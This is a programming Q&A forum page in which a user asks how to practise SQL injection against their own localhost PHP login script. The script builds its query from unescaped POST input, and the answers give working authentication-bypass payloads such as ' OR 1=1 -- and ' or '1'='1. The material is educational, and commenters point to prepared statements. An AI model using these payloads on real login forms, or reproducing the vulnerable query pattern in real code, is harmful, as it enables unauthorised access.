0


I want to try on my localhost SQL injection on this login script. But I dont know how. Database have three column id,nameUser,passwordUser. Or I need create some other script, which is unsecure for injection.
Thanks for your advice. 

if(isset($_POST['sent'])) {
$nameUser =  $_POST["name_User"];
$passwordUser = $_POST["password_User"];
$heslo = hash('sha512', $passwordUser);


$dotaz = $spojeni->query("select * from uzivatele where nameUser = '$nameUser' and passwordUser = '$heslo'");
$result = mysqli_num_rows($dotaz);
$row = mysqli_fetch_array($dotaz);
if ($result == 1) {
    echo "You are log in";
    die();
} else {
    echo "badlogin";
    exit();
} }
Improve this question
7
  • 2
    You should prepare a query, bind values and execute. It's that simple and this site is full of examples. Tried the search feature yet? Perhaps read the documentation Commented Feb 5, 2017 at 12:16
  • use prepare statements to prevent from sql injection w3schools.com/php/php_mysql_prepared_statements.asp Commented Feb 5, 2017 at 12:16
  • 1
    If you use something like ' OR 1=1; as a password it might just get you in. You need to use prepared statement, or at worst, escape you strings. Commented Feb 5, 2017 at 12:25
  • 1
    He clearly says he wants to try a SQL injection (perhaps for learning) so why are there answers that recommend PDO or mysqli? Commented Feb 5, 2017 at 12:35
  • It is worth noting that you're using both Procedural and Object Orientated MySQL interactions, which will not work and will give you various script errors. Commented Feb 5, 2017 at 12:57

3 Answers 3

Reset to default
1

To sign in as john (assuming it's a valid user) you can convert this:

select * from uzivatele where nameUser = '$nameUser' and passwordUser = '$heslo
                                          ^^^^^^^^^

... into this:

select * from uzivatele where nameUser = 'john' -- ' and passwordUser = '$heslo'
                                          ^^^^^^^^^

... by setting $_POST["name_User"] equal to the underlined code. The password condition is completely ignored because it's now inside a comment.

If you don't want to impersonate someone but just sign in with any random user, you only need to ensure that the final query returns exactly one row, e.g.:

select * from uzivatele where nameUser = '' OR 1=1 LIMIT 1 -- ' and passwordUser = '$heslo'
                                          ^^^^^^^^^^^^^^^^^^^^
Improve this answer
Sign up to request clarification or add additional context in comments.

2 Comments

but what if john is not a valid user?
@Martin Interesting question. I've expanded my answer.
0

NOTE:

I try everything ' OR 1=1 ' OR id = 1--...but dont work.

In your question you are using both Procedural and Object Orientated PHP MySQL interactions, which will not work and will give you various script errors. You need to use one or the other, these two things do not interact with each other!

My Answer

Strings in MySQL are encased in single quotes so you need to close off the string early, and then add any MySQL command you want to on the end before finally tidying up so you do not cause a syntax error in the original SQL statement (although from an injection point of view syntax errors can be beneficial in seeing just how vulnerable SQL queries are, as people with these vulnerbilities often output their errors to screen rather than log files, etc.):

part 1:

Close the input string early; x'

Part 2:

carry on the SQL statement adding your own instructions but not causing a Syntax error (part 3).

Typically using numbers: OR 1=1 (will always be true)

Part 3 preventing a syntax error.

-- or # (start comment) or appending the SQL so that the full SQL query is syntactically correct (injection string finishes with an open string): nameUser = 'z

So your input username string can now be: 

x' OR 1=1 OR nameUser='z

giving your SQL:

select * from uzivatele where nameUser = 'x' OR 1=1 OR nameUser='z' 
 and passwordUser = ''

Or alternatively using comments:

x' OR 1=1 -- 

select * from uzivatele where nameUser = 'x' OR 1=1 -- ' and passwordUser = ''
Improve this answer

4 Comments

So I fix query to $dotaz = mysqli_query($spojeni,"select * from uzivatele where nameUser = '$nameUser' and passwordUser = '$heslo'"); And now when i try your procedure using this x' OR 1=1 -- to nameUser. I still get badlogin echo. Or sometimes error mysqli_num_rows() expects parameter 1 to be mysqli_result
When I try injection syntax (' OR 1=1 LIMIT 1 -- , x' OR 1=1 -- ) to input nameUser and dump $dotaz I get bool(false) in $dotaz. Why ?
Procedural. This script work,but when I try put sql injection to input username. I get warning,because in $dotaz is bool.
$dotaz = mysqli_query($spojeni................ This is procedural like connection to database. $spojeni = mysqli_connect($db_server, $db_login, $db_password, $db_name) or die..... php.net/manual/en/mysqli.query.php
0 
' or '1'='1

If above is entered as username and password this will do what you are trying to achieve.

So query will get modified like:

SELECT * FROM uzivatele WHERE nameUser='' or '1'='1' AND passwordUser='' or '1'='1';

Its looking for each to be true, as 1 will always equal 1.

Improve this answer

Comments

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.